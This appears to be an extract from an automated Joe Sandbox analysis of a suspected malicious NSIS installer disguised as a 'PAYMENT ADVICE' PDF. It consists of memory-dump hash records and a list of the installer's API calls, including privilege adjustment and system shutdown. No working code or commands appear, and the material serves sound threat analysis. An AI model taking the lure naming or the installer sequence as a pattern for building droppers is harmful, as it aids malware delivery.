                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5c7b793571c0b703b1a340cb13996de292e181dba611eeaea5cc69aca192077b
                                                                                                                • Instruction ID: 34cfe23a89f6d71c5a3e6a7b8010befb37bf97930bf84c61b53dc165970d2796
                                                                                                                • Opcode Fuzzy Hash: 5c7b793571c0b703b1a340cb13996de292e181dba611eeaea5cc69aca192077b
                                                                                                                • Instruction Fuzzy Hash: 4F2114B8D1025ADFCF00DFA5D454AEEBBB1FB88311F109829E811B7260DB745A86CF90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e01bf97c2567290ba46b5bfbff453fbff11e2cbd29ba2758484f5476f813c609
                                                                                                                • Instruction ID: a55691982659aed9d12ba029402dc09040fcbacb331af07eada36ea65eabb458
                                                                                                                • Opcode Fuzzy Hash: e01bf97c2567290ba46b5bfbff453fbff11e2cbd29ba2758484f5476f813c609
                                                                                                                • Instruction Fuzzy Hash: 76019E78D05204EBCB00DFF8D8546EEBBB5EB8A301F60987AD814B3261DB395941CB61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998253773.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_ad000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: aca56fbe77c244d4696905f9713d117b98e5034cb26e61669678a3f0e23aca1b
                                                                                                                • Instruction ID: 7818cc73c2aacba9234af0a6b639495739c949f73dc9a330573b124dad83973c
                                                                                                                • Opcode Fuzzy Hash: aca56fbe77c244d4696905f9713d117b98e5034cb26e61669678a3f0e23aca1b
                                                                                                                • Instruction Fuzzy Hash: 5711DD75504280DFDB11CF54D5C0B15FFB2FB85314F28C6AAD84A4BA56C33AD84ACB62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0216b3728775392cac3104eb6750630626f121e56d86b2bf9affc6ec8868b618
                                                                                                                • Instruction ID: 876b48dbae9e63bcf37eb12ec63926a0daa2c8267c166935267ec7ffef3a484d
                                                                                                                • Opcode Fuzzy Hash: 0216b3728775392cac3104eb6750630626f121e56d86b2bf9affc6ec8868b618
                                                                                                                • Instruction Fuzzy Hash: EA012D72704154AFCF059E649C11AEF3FE6EBC9340B144029F911DB291CB718D469F90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: dde310c7e9950cd059291992bee9a4f6205ef597606808b9646d60d82a116bff
                                                                                                                • Instruction ID: 3a0d17ecb38658c2105894c0646468e76130a41045241add07be91fae92ff00d
                                                                                                                • Opcode Fuzzy Hash: dde310c7e9950cd059291992bee9a4f6205ef597606808b9646d60d82a116bff
                                                                                                                • Instruction Fuzzy Hash: 7C018C707006029FC714DF2EC48095ABBF6EFCA754705856AE006CB732EB30EC469B81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 28af2091fd2052853b8f4acf4c3bf422847a5634cfa0aa644aedba17c1693c79
                                                                                                                • Instruction ID: 7b7752ccb9b240d13bc7fe78408e026bb8976c02bf533ff74a9b5ec503ccda7f
                                                                                                                • Opcode Fuzzy Hash: 28af2091fd2052853b8f4acf4c3bf422847a5634cfa0aa644aedba17c1693c79
                                                                                                                • Instruction Fuzzy Hash: A001D1B2B042118BDB18AB7A988863E76EBFFC46613108439DD05DB220FF70CC048791
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 68e905971f7ba92256da3c6203e3651113bae6402b9f6bd8e97a21d476d095ce
                                                                                                                • Instruction ID: 59a9e4aee13c6c0bab313b349e94f01ebe25352516634225bf3c1676ddc62307
                                                                                                                • Opcode Fuzzy Hash: 68e905971f7ba92256da3c6203e3651113bae6402b9f6bd8e97a21d476d095ce
                                                                                                                • Instruction Fuzzy Hash: 9701D174910288DFDF05CFA0D808AE8BBB1EB8E301F005139E9007B250CB725947CFA4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 67058a9656c7a1b6f381ceb40da04c7b8f892ff8c0a28879bef89fa1deee6614
                                                                                                                • Instruction ID: f07faee6fbc53aefe8afb8c2358bd642f2e07497a7a94929b4dde836647870f6
                                                                                                                • Opcode Fuzzy Hash: 67058a9656c7a1b6f381ceb40da04c7b8f892ff8c0a28879bef89fa1deee6614
                                                                                                                • Instruction Fuzzy Hash: 07F08234D01208DFCB04DFA8D9046EDBBF2EB8A301F10A42AC814B3260DB399912CF90
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bb032050777ac63cb691a6ae3a2653cd2253a8652075792165816d9fa45556cb
                                                                                                                • Instruction ID: d6f3380693c8c90686d367730b7c90d4f654138e5e9ec82efd6b631eb7d7eb2f
                                                                                                                • Opcode Fuzzy Hash: bb032050777ac63cb691a6ae3a2653cd2253a8652075792165816d9fa45556cb
                                                                                                                • Instruction Fuzzy Hash: 94F0A0B134020127E20472BE4815B7B6A9A9BCA761F144836EA01EB244EE95AC5507F2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 62f3709d51e7a18f044f4d1cf5097bff2fbccc6126a3457058f996417bb49c4b
                                                                                                                • Instruction ID: 4d883ea76c8d9319bf2bb46e0cc21c164f1038e6847a1a63df26a06ae4cf7cda
                                                                                                                • Opcode Fuzzy Hash: 62f3709d51e7a18f044f4d1cf5097bff2fbccc6126a3457058f996417bb49c4b
                                                                                                                • Instruction Fuzzy Hash: B9F0AE75425F42AFE3012B70ACAC37A7BB1FB4B313B862D60E08A860329B784455CB15
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9407c86f95584712d78a9cfdebaaa0c06733a8b91f34feea7e2b947e16201f9a
                                                                                                                • Instruction ID: b47e8bc3f6f26f67ef10020f27dcd9915f25f83b20222953f749a833ecde66fa
                                                                                                                • Opcode Fuzzy Hash: 9407c86f95584712d78a9cfdebaaa0c06733a8b91f34feea7e2b947e16201f9a
                                                                                                                • Instruction Fuzzy Hash: A7F08274D05348EFCB05DFB4D40959C7FB1EB45301F5041BAD815A7261E7318E56DB40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c8e75130395479f98ce403ca1b1fb479277ead6a8e7d3a099b4af995db55dba5
                                                                                                                • Instruction ID: 20a9db06f824aa2b90c30402a6b4cfd7b64765c8826fd64a3d918096042b0cc5
                                                                                                                • Opcode Fuzzy Hash: c8e75130395479f98ce403ca1b1fb479277ead6a8e7d3a099b4af995db55dba5
                                                                                                                • Instruction Fuzzy Hash: 7CE02B31D143960AC7026B709C005DEBF34DF83121F0503E7D05427051E720151CC361
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 72f2c7588b1a3aabe77b0bb1dc132dc94e1a498d532fe54362bd4bc4b13b3540
                                                                                                                • Instruction ID: 0ce755d31625d1fb35f5ac0ad460dfab1a192344b5791f7485230a5285fff0ac
                                                                                                                • Opcode Fuzzy Hash: 72f2c7588b1a3aabe77b0bb1dc132dc94e1a498d532fe54362bd4bc4b13b3540
                                                                                                                • Instruction Fuzzy Hash: D3E09274D04208DFCB04DFB8D40969CBBF5EB48301F6080B9D814A3350EB305E46CB40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e6ec71f71490661ececba28194c92251c3cfb17c05fb89aab64fa22ab94d2a6d
                                                                                                                • Instruction ID: 8aff5a8cb07e1b5fb1c5120d8562df4f24cd4e068214f4ff16f76a46b33755a7
                                                                                                                • Opcode Fuzzy Hash: e6ec71f71490661ececba28194c92251c3cfb17c05fb89aab64fa22ab94d2a6d
                                                                                                                • Instruction Fuzzy Hash: C8E02B7511D3008FD3019A6EDCA46EA3FE8FF8B710F140CC3D8804F132E4026C08964A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 55a8782047852572924f02685bfde8d03589e2e01b5992d9e3ccb2d84d0dde37
                                                                                                                • Instruction ID: 2fba4dd10b8816e9e2bd3fbdaf1e0b8aadf56bb7fb7545ada84cb5f9aa274ece
                                                                                                                • Opcode Fuzzy Hash: 55a8782047852572924f02685bfde8d03589e2e01b5992d9e3ccb2d84d0dde37
                                                                                                                • Instruction Fuzzy Hash: D9E0C27080A388EFC701CF64D415AE87F74AB03211F0450DAE81867263D7740E24D786
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 992604ad5f92b06e95ab60713a21ed432ad4abe5257eb432e974fd2f53ffe4d7
                                                                                                                • Instruction ID: 77248a1c9d9afddec347eacc9eb5ecce2baff67bbb9f416329380705e5750edc
                                                                                                                • Opcode Fuzzy Hash: 992604ad5f92b06e95ab60713a21ed432ad4abe5257eb432e974fd2f53ffe4d7
                                                                                                                • Instruction Fuzzy Hash: 35D01231D2022A56CB15A6A5DC444EEB738EE95262B504666D51437140EB70265D86A1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e757ec63ac6c71e6ee4a4fa3be93e761987a99bb26b484b9c18f3e13de65492f
                                                                                                                • Instruction ID: 40bbc97d6d72ad70074b629fe37d7ed060e3b6ed24b213fff4badf94964f405a
                                                                                                                • Opcode Fuzzy Hash: e757ec63ac6c71e6ee4a4fa3be93e761987a99bb26b484b9c18f3e13de65492f
                                                                                                                • Instruction Fuzzy Hash: 33D0523610C2814FCB1286B0A8528D67F785F13214B15A2EAE886CBEB3C19A98858B12
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6d783f9ca1c242ac2bd13d01479eae61629b83082b226dea0a50286f29eaf23d
                                                                                                                • Instruction ID: 80e17e36a36533d78a08bd66aa3afe7e74a9b82d93bd6ee2fb0541191eea05c0
                                                                                                                • Opcode Fuzzy Hash: 6d783f9ca1c242ac2bd13d01479eae61629b83082b226dea0a50286f29eaf23d
                                                                                                                • Instruction Fuzzy Hash: 36E0CD7104C3C94FC203F776EC445457B2B5B81204B044595E4450F5ABEE7456C987A2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d0522718df7c90c2f16c55bb6d6bf6745ddf4c581cea12bdd7d23dbc400b3e78
                                                                                                                • Instruction ID: af1925b59c140dbd26f7ec02e972f869c5db431df3920b4f8b4659de293f6dad
                                                                                                                • Opcode Fuzzy Hash: d0522718df7c90c2f16c55bb6d6bf6745ddf4c581cea12bdd7d23dbc400b3e78
                                                                                                                • Instruction Fuzzy Hash: 41D0A73254E7901FD71782397814C997FB54ECA71070945FBF04CCF0D2E6890A4A878B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: edcdf101d3bed04bc0461697f3db03796b31ceae7f70c646c53d6078af59300d
                                                                                                                • Instruction ID: 5591b7b98e0fe995f30dea8e1229a9b3ee140747c4c87564e3a5802375e50d5a
                                                                                                                • Opcode Fuzzy Hash: edcdf101d3bed04bc0461697f3db03796b31ceae7f70c646c53d6078af59300d
                                                                                                                • Instruction Fuzzy Hash: FAD0677AB40018AFCF049F98EC808DDF776FB98221B048116F915A3265C6319965DB50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 914c4f19a7e6d6166fb9e82148205572bb9802e8ba00cddbde9b03474cdbf56b
                                                                                                                • Instruction ID: 49d5e2ea9eaecaf343a40e433f6aa0185f203fca6f45779d220a9dd122a79cab
                                                                                                                • Opcode Fuzzy Hash: 914c4f19a7e6d6166fb9e82148205572bb9802e8ba00cddbde9b03474cdbf56b
                                                                                                                • Instruction Fuzzy Hash: 4FD0223080120CEFC700DFA4D809BE9B77CE703302F0000ACA80823210CBB10D00C788
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bee46a6fa2cba304a56aedcda377e819b2d5818e534b3e3235e3dcdbb5a4a921
                                                                                                                • Instruction ID: 9032a70a54d0257fcac0b758fbdd55d26b7600ee49afc2c880c5582646e60b90
                                                                                                                • Opcode Fuzzy Hash: bee46a6fa2cba304a56aedcda377e819b2d5818e534b3e3235e3dcdbb5a4a921
                                                                                                                • Instruction Fuzzy Hash: 94C08073605510274614A22DB8405DE5FD5CFCE321710CD37F415DF1045D515D4781C7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 67b830601c75ea5e0c531022875047b1400a16a9db7751db661d743b12059ac5
                                                                                                                • Instruction ID: 00aae8352bf4677b91a562429a170e7aaff0cea240ea4a0826f7f7c1c5e10158
                                                                                                                • Opcode Fuzzy Hash: 67b830601c75ea5e0c531022875047b1400a16a9db7751db661d743b12059ac5
                                                                                                                • Instruction Fuzzy Hash: 2BC08C74042E099BE2042F50BC0CB79BBB8B747323FC82D10E41C028308BB85414CA44
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 86788cd31eae8a764e11da47a964737f9d7cb6509dd5f81a3a0d1710b4ff223a
                                                                                                                • Instruction ID: 8c10284969ae5e97a61e661e6c7143337a04769f879f4c581b095c22d1dadeee
                                                                                                                • Opcode Fuzzy Hash: 86788cd31eae8a764e11da47a964737f9d7cb6509dd5f81a3a0d1710b4ff223a
                                                                                                                • Instruction Fuzzy Hash: 59C012700143494AC606EBB7EC45955372BA784308740C910B0060A56EEEB459CA4BD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7e832f806d78bea30173e9796c82e1d08a5be16d2dfccb3d90cfab79b8244785
                                                                                                                • Instruction ID: 519f407b006d5752c65e26dc963d19e6ccf411adc289331e546c3309c6f4c643
                                                                                                                • Opcode Fuzzy Hash: 7e832f806d78bea30173e9796c82e1d08a5be16d2dfccb3d90cfab79b8244785
                                                                                                                • Instruction Fuzzy Hash: 93C08C302683048FE200AA1ED884A2137ECFF89B04F2058E0F4148F621DB22FC004A05
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fe2422dfef33a28884e8b3aec7072c76e2b274ab22c4306fc61f403da27f3aea
                                                                                                                • Instruction ID: 33dc431f17a4a20c070f3c0e0363b5e411e26ee5681999db64effc4ae9e368a1
                                                                                                                • Opcode Fuzzy Hash: fe2422dfef33a28884e8b3aec7072c76e2b274ab22c4306fc61f403da27f3aea
                                                                                                                • Instruction Fuzzy Hash: 4EC002B55097815FDB165B3159299453FA0AE5321430706EF90928B4B3992545158712
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ea0c6b1ce0ebd0c3effea4396c730b1ac4a754ea1808271e1858f92abd29bc20
                                                                                                                • Instruction ID: a6c6753b14b412b7b83feb6f77a93aaba45b2df693b1ebeaa84396c37d5cdc11
                                                                                                                • Opcode Fuzzy Hash: ea0c6b1ce0ebd0c3effea4396c730b1ac4a754ea1808271e1858f92abd29bc20
                                                                                                                • Instruction Fuzzy Hash: 59A0223CB0000283C308EB00E200C0FE3832FE0203B00C02C2000030B88820CC00C022
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32 ref: 004032C2
                                                                                                                • GetVersion.KERNEL32 ref: 004032C8
                                                                                                                • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                                • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                                • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                                • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0043F000,00000000), ref: 00403363
                                                                                                                • CharNextW.USER32(00000000,0043F000,00000020), ref: 0040338A
                                                                                                                  • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                  • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                • GetTempPathW.KERNEL32(00000400,00441800), ref: 004034C5
                                                                                                                • GetWindowsDirectoryW.KERNEL32(00441800,000003FB), ref: 004034D6
                                                                                                                • lstrcatW.KERNEL32(00441800,\Temp), ref: 004034E2
                                                                                                                • GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp), ref: 004034F6
                                                                                                                • lstrcatW.KERNEL32(00441800,Low), ref: 004034FE
                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low), ref: 0040350F
                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,00441800), ref: 00403517
                                                                                                                • DeleteFileW.KERNEL32(00441000), ref: 0040352B
                                                                                                                  • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                                • ExitProcess.KERNEL32 ref: 00403618
                                                                                                                • lstrcatW.KERNEL32(00441800,~nsu,0043F000,00000000,?), ref: 0040362B
                                                                                                                • lstrcatW.KERNEL32(00441800,0040A26C,00441800,~nsu,0043F000,00000000,?), ref: 0040363A
                                                                                                                • lstrcatW.KERNEL32(00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403645
                                                                                                                • lstrcmpiW.KERNEL32(00441800,00440800,00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403651
                                                                                                                • SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 0040366D
                                                                                                                • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                                • CopyFileW.KERNEL32(00442800,0042AA28,00000001), ref: 004036DB
                                                                                                                • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                                • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998662941.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.2998644034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998682494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998701514.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000004.00000002.2998728371.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                • String ID: .tmp$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                • API String ID: 3586999533-3972089011
